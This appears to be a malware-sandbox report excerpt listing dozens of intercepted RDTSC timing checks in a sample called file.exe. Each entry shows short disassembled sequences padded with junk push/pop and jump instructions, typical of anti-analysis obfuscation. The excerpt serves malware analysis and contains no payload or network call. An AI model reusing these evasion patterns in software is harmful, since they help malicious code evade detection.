                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C18F8 second address: 9C1902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2EE4767536h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D7FA second address: A0D803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D803 second address: A0D835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F2EE476753Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F2EE476753Ah 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push edx 0x0000001a jmp 00007F2EE476753Dh 0x0000001f push edx 0x00000020 pop edx 0x00000021 pop edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1222B second address: A12279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2EE474417Dh 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F2EE4744189h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11F1C second address: A11F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE476753Eh 0x00000009 popad 0x0000000a jl 00007F2EE476753Ah 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2EE476753Ch 0x0000001b jmp 00007F2EE476753Ah 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A3AB second address: A1A3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A3AF second address: A1A3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE476753Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F2EE4767542h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A3CC second address: A1A3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A6C3 second address: A1A6C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AF31 second address: A1AF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AF35 second address: A1AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2EE4767543h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2343D second address: A23444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23815 second address: A23828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2EE4767536h 0x0000000a pushad 0x0000000b je 00007F2EE4767536h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23828 second address: A2382E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2382E second address: A2383B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F2EE476753Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2383B second address: A23848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jg 00007F2EE4744176h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C23 second address: A23C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2EE4767536h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C34 second address: A23C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F2EE4744183h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C54 second address: A23C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F2EE476753Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23DD1 second address: A23DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23F5A second address: A23F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23F60 second address: A23F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CD4B second address: A2CD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CD50 second address: A2CD58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AE6F second address: A2AE77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B415 second address: A2B432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744189h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B432 second address: A2B438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B438 second address: A2B43E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B43E second address: A2B444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B444 second address: A2B448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B448 second address: A2B456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F2EE4767536h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B56C second address: A2B570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B570 second address: A2B584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2EE476753Ch 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B584 second address: A2B598 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2EE474417Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F2EE4744176h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B598 second address: A2B5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767546h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2EE4767542h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B5CB second address: A2B5F1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE4744176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F2EE4744187h 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B732 second address: A2B73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B73D second address: A2B741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B741 second address: A2B781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2EE4767548h 0x0000000c jbe 00007F2EE4767536h 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F2EE4767540h 0x00000019 popad 0x0000001a jo 00007F2EE476753Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA14 second address: A2BA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA1A second address: A2BA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F2EE4767546h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA3B second address: A2BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2EE474417Dh 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA0F second address: A2AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA13 second address: A2AA41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F2EE4744182h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA41 second address: A2AA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A344C9 second address: A344CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34679 second address: A3467F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A347BA second address: A347C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A347C0 second address: A347C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A347C6 second address: A3481D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE4744188h 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F2EE4744188h 0x00000012 pop eax 0x00000013 jp 00007F2EE474417Ah 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F2EE4744176h 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jbe 00007F2EE4744176h 0x0000002b push edx 0x0000002c pop edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4154F second address: A41557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4106B second address: A4106F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4106F second address: A41081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE476753Ch 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41081 second address: A4108C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F2EE4744176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44805 second address: A44823 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F2EE4767536h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F2EE4767557h 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F2EE4767536h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44951 second address: A4495B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2EE4744176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4987B second address: A49889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 js 00007F2EE4767536h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C3C7 second address: 97C3CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C3CF second address: 97C3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C3D7 second address: 97C3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C3DB second address: 97C3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4971C second address: A49725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A535C9 second address: A535CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A535CD second address: A535E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2EE4744176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2EE474417Eh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A535E7 second address: A5360E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767544h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5360E second address: A53612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A565B1 second address: A565B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58393 second address: A583A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F2EE474417Eh 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A583A6 second address: A583AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A607FD second address: A60803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60803 second address: A60807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60807 second address: A60817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2EE474417Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F1EB second address: A5F206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F2EE4767542h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F38F second address: A5F396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F396 second address: A5F39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F39D second address: A5F3A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2EE4744176h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F3A9 second address: A5F3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F3AD second address: A5F3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F579 second address: A5F57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F57E second address: A5F584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F6AA second address: A5F6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F6B0 second address: A5F6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F6B8 second address: A5F6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2EE4767536h 0x0000000a pop ecx 0x0000000b jmp 00007F2EE4767543h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F6DC second address: A5F6E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F864 second address: A5F878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767540h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F878 second address: A5F881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A670AC second address: A670CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE4767549h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66CA8 second address: A66CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66CAE second address: A66CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66CB3 second address: A66CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE4744185h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66CCC second address: A66CD6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2EE4767536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84587 second address: A845A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE474417Dh 0x00000009 popad 0x0000000a jng 00007F2EE4744182h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A864EE second address: A864F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A864F2 second address: A864F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A864F8 second address: A86504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F2EE4767536h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86232 second address: A86236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0756 second address: AA075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA075D second address: AA0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744183h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F2EE4744186h 0x0000000f pushad 0x00000010 jne 00007F2EE4744176h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0291 second address: AA02B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F2EE4767547h 0x0000000e jp 00007F2EE4767536h 0x00000014 popad 0x00000015 rdtsc
